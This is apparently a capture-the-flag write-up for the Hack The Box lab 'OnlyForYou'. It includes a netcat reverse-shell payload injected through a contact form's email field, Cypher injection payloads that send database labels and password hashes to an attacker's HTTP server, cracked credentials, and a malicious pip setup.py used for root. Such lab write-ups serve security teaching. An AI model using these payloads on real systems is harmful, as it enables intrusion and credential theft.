OnlyForYou
Write up for the HTB machine 'OnlyForYou'
1. Initial recon
1.1. nikto
nikto -host 10.10.11.210
- Server: nginx/1.18.0 (Ubuntu)
- Root page / redirects to: http://only4you.htb/
- nginx/1.18.0 appears to be outdated (current is at least 1.20.1).
1.2. nmap
nmap -sC -sV 10.10.11.210
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e883e0a9fd43df38198aaa35438411ec (RSA)
| 256 83f235229b03860c16cfb3fa9f5acd08 (ECDSA)
|_ 256 445f7aa377690a77789b04e09f11db80 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Only4you
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
1.3. web application recon
Under the Frequently Asked Questions section there is a "Are there some products available to check?" section which leads to beta.only4you.htb
From beta.only4you.htb
we can download some source code
Looking in app.py
we can find
/list
/download
/convert (also linked on the nav bar of the web app)
/resize (also linked on the nav bar of the web app)
after uploading an image, we are redirected to a download page where we can download a resized image of the one we just uploaded, here we find a Local File Inclusion vulnerability where we are able to download any file on the system that we want.
capture the download in BurpSuite and change the file name in the POST request parameter
image
by downloading /etc/passwd
we can see some users
john:x:1000:1000:john:/home/john:/bin/bash
neo4j:x:997:997::/var/lib/neo4j:/bin/bash
dev:x:1001:1001::/home/dev:/bin/bash
we know from our nikto scan that the server is running nginx so we should also take a look at /etc/nginx/sites-available/default
server {
listen 80;
return 301 http://only4you.htb$request_uri;
}
server {
listen 80;
server_name only4you.htb;
location / {
include proxy_params;
proxy_pass http://unix:/var/www/only4you.htb/only4you.sock;
}
}
server {
listen 80;
server_name beta.only4you.htb;
location / {
include proxy_params;
proxy_pass http://unix:/var/www/beta.only4you.htb/beta.sock;
}
}
this reveals that the main app.py
is at /var/www/only4you.htb/app.py
looking in app.py
we can see an import for forms.py
in forms.py
we can see that there is RCE via the lines
domain = email.split("@", 1)[1]
result = run([f"dig txt {domain}"], shell=True, stdout=PIPE)
with the payload being delivered through the post request on the contact form found on only4you.htb
name=123&email=123%40abc.def|rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2>%261|nc+10.10.x.x+4444+>/tmp/f&subject=123&message=123
now we have a reverse shell as the user www-data
2. user.txt
With our www-data
reverse shell let's start by making it an interactive shell by running python3 -c 'import pty;pty.spawn("/bin/bash");'
2.1. linpeas
By navigating to /tmp
on the victim machine, and hosting a http server using python3 -m http.server
on our attacking machine, we can then run curl 10.10.x.x:8000/linpeas.sh > linpeas.sh
and chmod +x linpeas.sh
on the victim machine to download and run linpeas on the victim machine to (hopefully) find any simple privilege escalation vectors.
the most interesting output from linpeas is the active ports
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8001 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1036/nginx: worker
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 127.0.0.1:7687 :::* LISTEN -
tcp6 0 0 127.0.0.1:7474 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
so let's investigate these more
simply curling them with curl 127.0.0.1:PORT
reveals:
curl 127.0.0.1:3000
...
<meta name="author" content="Gogs" />
<meta name="description" content="Gogs is a painless self-hosted Git service" />
<meta name="keywords" content="go, git, self-hosted, gogs">
...
curl 127.0.0.1:8001
<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="/login">/login</a>. If not, click the link.
curl 127.0.0.1:7474
{
"bolt_routing" : "neo4j://127.0.0.1:7687",
"transaction" : "http://127.0.0.1:7474/db/{databaseName}/tx",
"bolt_direct" : "bolt://127.0.0.1:7687",
"neo4j_version" : "5.6.0",
"neo4j_edition" : "community"
}
2.2. chisel (port forwarding)
so now let's try and port forward them so we can view them in the browser
let's use Chisel
similar to linpeas
we also need to curl chisel
to the victim machine using the same method
once
chisel
is on the victim machine run the following commands./chisel server -p 12312 --reverse
on your attacking machine./chisel client 10.10.x.x:12312 R:8001:127.0.0.1:8001
on the victim machine for the admin dashboard./chisel client 10.10.14.6:12312 R:3000:127.0.0.1:3000
on the victim machine for the local git service
then we can navigate to 127.0.0.1:8001/login
and we will be presented with a log in screen
trying some default credentials
admin:admin
leads us to a dashboard
2.3. neo4j injection
we can see on the dashboard that the database has been updated to Neo4j so let's see if there are any vulnerabilities
from HackTricks there are a couple of injection payloads we can try
to catch these payloads, spin up another http server using python on your attacking machine, python3 -m http.server
' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.10.x.x:8000/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //
This payload we can find on hacktricks, but noticing that the above payload works, and this one doesn't we can slightly modify it
'}) RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://attacker_ip /?l='+label as l RETURN 0 as _0
to this
' OR 1=1 WITH 1 as a CALL db.labels() yield label LOAD CSV FROM 'http://attacker_ip:8000/?label='+label as l RETURN 0 as _0 //
from the above payload we can see that there are two labels user
and employee
(check the shell where you're running your python server)
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.210 - - [25/Apr/2023 04:14:10] "GET /?label=user HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:10] "GET /?label=employee HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:10] "GET /?label=user HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:10] "GET /?label=employee HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:10] "GET /?label=user HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:11] "GET /?label=employee HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:11] "GET /?label=user HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:11] "GET /?label=employee HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:11] "GET /?label=user HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:11] "GET /?label=employee HTTP/1.1" 200 -
finally, this payload
' OR 1=1 WITH 1 as a MATCH (f:Flag) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.x.x:8000/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //
is modified to this
' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.x.x:8000/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //
and we are presented with this output
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=admin HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=john HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=admin HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=john HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=admin HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=john HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=admin HTTP/1.1" 200 -
now let's try and crack these hashes on CrackStation
8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 sha256 admin
a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 sha256 ThisIs4You
we are now able to ssh into the machine with the credentials
john:ThisIs4You
user.txt
is located in /home/john
3. root.txt
Remembering we also port forwarded the local git service which is at port 3000. at localhost:3000/explore/users
we can see that john is also a user, so let's see if he reuses his credentials, he does. Unfortunately there's nothing really interesting on the git repositories
sudo -l
on our ssh terminal shows
User john may run the following commands on only4you:
(root) NOPASSWD: /usr/bin/pip3 download http\://127.0.0.1\:3000/*.tar.gz
The first link after googling "pip install download vuln" returns us this article
clone the repo linked in the article to our attacking machine
and then we can simply change setup.py
to
...
import os
def RunCommand():
os.system("chmod u+s /bin/bash")
...
run python -m build
in the directory of the cloned repo to create our payload
to get the payload to work we first need to make the Test
repo at http://localhost:3000/john/Test
public and then we can upload our payload
our command on the victim machine will finally be:
sudo /usr/bin/pip3 download http\://127.0.0.1\:3000/john/Test/raw/master/this_is_fine_wuzzi-0.0.1.tar.gz
then run /bin/bash -p
on the victim machine and we are root!
Last updated
Was this helpful?